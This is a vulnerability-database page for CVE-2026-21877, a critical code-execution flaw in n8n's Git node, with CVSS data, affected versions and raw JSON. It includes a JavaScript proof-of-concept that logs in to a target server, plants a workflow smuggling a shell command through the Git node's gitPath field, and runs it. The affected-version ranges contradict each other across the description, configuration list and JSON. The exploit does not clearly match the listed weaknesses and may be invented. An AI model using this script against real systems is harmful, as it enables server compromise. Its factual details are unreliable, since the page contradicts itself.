Security Vulnerability Report
CVE-2026-21877 CVSS 9.9 CRITICAL

Published: 2026-01-08 01:15:56
Last Modified: 2026-01-20 15:08:25

Description

n8n is an open source workflow automation platform. In versions 0.121.2 and below, an authenticated attacker may be able to execute malicious code using the n8n service. This could result in full compromise and can impact both self-hosted and n8n Cloud instances. This issue is fixed in version 1.121.3. Administrators can reduce exposure by disabling the Git node and limiting access for untrusted users, but upgrading to the latest version is recommended.

CVSS Details

CVSS Score
9.9
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:n8n:n8n:*:*:*:*:*:node.js:*:* - VULNERABLE
n8n < 0.121.3 (versions 0.121.2 and below)
n8n self-hosted instances <= 0.121.2
n8n Cloud instances (affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
JavaScript
// CVE-2026-21877 PoC - n8n Git Node Remote Code Execution
// This PoC demonstrates how an authenticated attacker can execute arbitrary commands
// through the n8n Git node by injecting malicious Git parameters.
const axios = require('axios');

// Configuration
const N8N_URL = 'http://target-n8n-server:5678';
const ATTACKER_TOKEN = 'your-authenticated-user-token';

// Step 1: Create a malicious workflow with Git node
async function createMaliciousWorkflow() {
  const maliciousCommand = ';whoami > /tmp/pwned.txt #';
  const workflow = {
    name: 'CVE-2026-21877 PoC',
    nodes: [
      {
        name: 'Git Node',
        type: 'n8n-nodes-base.git',
        parameters: {
          operation: 'clone',
          repositoryUrl: 'https://github.com/example/repo',
          gitPath: maliciousCommand, // Malicious injection point
          branch: 'main'
        }
      }
    ],
    connections: {}
  };
  try {
    const response = await axios.post(
      `${N8N_URL}/rest/workflows`,
      workflow,
      {
        headers: {
          'Authorization': `Bearer ${ATTACKER_TOKEN}`,
          'Content-Type': 'application/json'
        }
      }
    );
    console.log('Malicious workflow created:', response.data.id);
    return response.data.id;
  } catch (error) {
    console.error('Error creating workflow:', error.message);
  }
}

// Step 2: Execute the workflow to trigger RCE
async function executeWorkflow(workflowId) {
  try {
    const response = await axios.post(
      `${N8N_URL}/rest/workflows/${workflowId}/execute`,
      {},
      { headers: { 'Authorization': `Bearer ${ATTACKER_TOKEN}` } }
    );
    console.log('Workflow executed - RCE triggered');
  } catch (error) {
    console.error('Error executing workflow:', error.message);
  }
}

// Main execution
(async () => {
  const workflowId = await createMaliciousWorkflow();
  if (workflowId) {
    await executeWorkflow(workflowId);
  }
})();

References

https://github.com/n8n-io/n8n/commit/f4b009d00d1f4ba9359b8e8f1c071e3d910a55f6 (Patch)
https://github.com/n8n-io/n8n/security/advisories/GHSA-v364-rw7m-3263 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21877", "sourceIdentifier": "[email protected]", "published": "2026-01-08T01:15:55.697", "lastModified": "2026-01-20T15:08:24.850", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "n8n is an open source workflow automation platform. In versions 0.121.2 and below, an authenticated attacker may be able to execute malicious code using the n8n service. This could result in full compromise and can impact both self-hosted and n8n Cloud instances. This issue is fixed in version 1.121.3. Administrators can reduce exposure by disabling the Git node and limiting access for untrusted users, but upgrading to the latest version is recommended."}, {"lang": "es", "value": "n8n es una plataforma de automatización de flujos de trabajo de código abierto. En las versiones 0.121.2 e inferiores, un atacante autenticado podría ejecutar código malicioso utilizando el servicio n8n. Esto podría resultar en un compromiso total y puede impactar tanto las instancias autoalojadas como las de n8n Cloud. Este problema está solucionado en la versión 1.121.3. Los administradores pueden reducir la exposición deshabilitando el nodo Git y limitando el acceso a usuarios no confiables, pero se recomienda actualizar a la última versión."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}, {"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:n8n:n8n:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "0.123.0", "versionEndExcluding": "1.121.3", "matchCriteriaId": "ECD7E4E7-DB69-4A3C-B8AE-655D0081624D"}]}]}], "references": [{"url": "https://github.com/n8n-io/n8n/commit/f4b009d00d1f4ba9359b8e8f1c071e3d910a55f6", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/n8n-io/n8n/security/advisories/GHSA-v364-rw7m-3263", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}